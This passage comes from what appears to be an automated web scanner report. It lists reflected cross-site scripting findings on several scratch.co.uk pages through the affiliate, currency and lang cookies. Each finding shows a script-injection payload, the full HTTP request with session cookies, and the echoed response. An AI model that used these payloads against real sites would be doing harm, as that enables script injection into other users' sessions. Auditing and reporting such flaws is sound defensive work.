<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="http://www.hopa.com/visit.aspx?csi=10&CorID=deletedaf05e"><script>alert(1)</script>d33344ce0f7&SentDate=&CorExpTime=&" class="iframe" >
...[SNIP]...

3.154. http://scratch.co.uk/about/ [affiliate cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/about/

Issue detail

The value of the affiliate cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c841f"><script>alert(1)</script>c26133aa53 was submitted in the affiliate cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /about/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243c841f"><script>alert(1)</script>c26133aa53; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:26:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243c841f%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ec26133aa53; expires=Wed, 15-Jun-2011 12:26:03 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:26:03 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:26:03 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:26:03 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 13261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG', 'direct-173|193|214|243c841f"><script>alert(1)</script>c26133aa53');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.155. http://scratch.co.uk/about/ [currency cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/about/

Issue detail

The value of the currency cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 102dc"><script>alert(1)</script>b576efef7c6 was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /about/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP102dc"><script>alert(1)</script>b576efef7c6;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:29:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:55 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:29:55 GMT; path=/
Set-Cookie: currency=GBP102dc%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eb576efef7c6; expires=Wed, 15-Jun-2011 12:29:55 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:55 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 13003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP102dc"><script>alert(1)</script>b576efef7c6', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.156. http://scratch.co.uk/about/ [lang cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/about/

Issue detail

The value of the lang cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f717"><script>alert(1)</script>9b4eec3d242 was submitted in the lang cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /about/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG2f717"><script>alert(1)</script>9b4eec3d242; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:29:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:13 GMT; path=/
Set-Cookie: lang=ENG2f717%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E9b4eec3d242; expires=Wed, 15-Jun-2011 12:29:13 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:13 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:13 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 13112

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG2f717"><script>alert(1)</script>9b4eec3d242', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.157. http://scratch.co.uk/contact/ [affiliate cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/contact/

Issue detail

The value of the affiliate cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94bc4"><script>alert(1)</script>062cf6e61a2 was submitted in the affiliate cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /contact/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C24394bc4"><script>alert(1)</script>062cf6e61a2; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:26:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C24394bc4%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E062cf6e61a2; expires=Wed, 15-Jun-2011 12:26:08 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:26:08 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:26:08 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:26:08 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 15000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG', 'direct-173|193|214|24394bc4"><script>alert(1)</script>062cf6e61a2');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.158. http://scratch.co.uk/contact/ [currency cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/contact/

Issue detail

The value of the currency cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fc52"><script>alert(1)</script>4e4316f61d0 was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /contact/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP3fc52"><script>alert(1)</script>4e4316f61d0;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:37 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:37 GMT; path=/
Set-Cookie: currency=GBP3fc52%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e4316f61d0; expires=Wed, 15-Jun-2011 12:30:37 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:37 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14998

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP3fc52"><script>alert(1)</script>4e4316f61d0', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.159. http://scratch.co.uk/contact/ [lang cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/contact/

Issue detail

The value of the lang cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cf9c"><script>alert(1)</script>10570ae66c1 was submitted in the lang cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /contact/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG7cf9c"><script>alert(1)</script>10570ae66c1; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:11 GMT; path=/
Set-Cookie: lang=ENG7cf9c%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E10570ae66c1; expires=Wed, 15-Jun-2011 12:30:11 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:30:11 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:11 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 15000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG7cf9c"><script>alert(1)</script>10570ae66c1', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.160. http://scratch.co.uk/help/ [affiliate cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/help/

Issue detail

The value of the affiliate cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9f4c"><script>alert(1)</script>eaf4b62400f was submitted in the affiliate cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /help/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243c9f4c"><script>alert(1)</script>eaf4b62400f; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243c9f4c%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eeaf4b62400f; expires=Wed, 15-Jun-2011 12:25:46 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:46 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:46 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:46 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 11402

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG', 'direct-173|193|214|243c9f4c"><script>alert(1)</script>eaf4b62400f');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.161. http://scratch.co.uk/help/ [currency cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/help/

Issue detail

The value of the currency cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b813a"><script>alert(1)</script>e452f3eaa1a was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /help/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBPb813a"><script>alert(1)</script>e452f3eaa1a;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:08 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:08 GMT; path=/
Set-Cookie: currency=GBPb813a%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee452f3eaa1a; expires=Wed, 15-Jun-2011 12:30:08 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:08 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 11400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBPb813a"><script>alert(1)</script>e452f3eaa1a', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.162. http://scratch.co.uk/help/ [lang cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/help/

Issue detail

The value of the lang cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1ac7"><script>alert(1)</script>f16dba27792 was submitted in the lang cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /help/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENGc1ac7"><script>alert(1)</script>f16dba27792; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:29:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:23 GMT; path=/
Set-Cookie: lang=ENGc1ac7%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ef16dba27792; expires=Wed, 15-Jun-2011 12:29:23 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:23 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:23 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 11402

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENGc1ac7"><script>alert(1)</script>f16dba27792', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.163. http://scratch.co.uk/help/deposit/methods/ [affiliate cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/help/deposit/methods/

Issue detail

The value of the affiliate cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b792"><script>alert(1)</script>7be29cfe53a was submitted in the affiliate cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /help/deposit/methods/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C2434b792"><script>alert(1)</script>7be29cfe53a; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:26:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C2434b792%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E7be29cfe53a; expires=Wed, 15-Jun-2011 12:26:03 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:26:03 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:26:03 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:26:03 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 18431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG', 'direct-173|193|214|2434b792"><script>alert(1)</script>7be29cfe53a');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.164. http://scratch.co.uk/help/deposit/methods/ [currency cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/help/deposit/methods/

Issue detail

The value of the currency cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb9ed"><script>alert(1)</script>e3eb6fdaf26 was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /help/deposit/methods/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBPfb9ed"><script>alert(1)</script>e3eb6fdaf26;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:32 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:32 GMT; path=/
Set-Cookie: currency=GBPfb9ed%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee3eb6fdaf26; expires=Wed, 15-Jun-2011 12:30:32 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:32 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 18429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBPfb9ed"><script>alert(1)</script>e3eb6fdaf26', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.165. http://scratch.co.uk/help/deposit/methods/ [lang cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/help/deposit/methods/

Issue detail

The value of the lang cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2c6e"><script>alert(1)</script>f553ccebbf was submitted in the lang cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

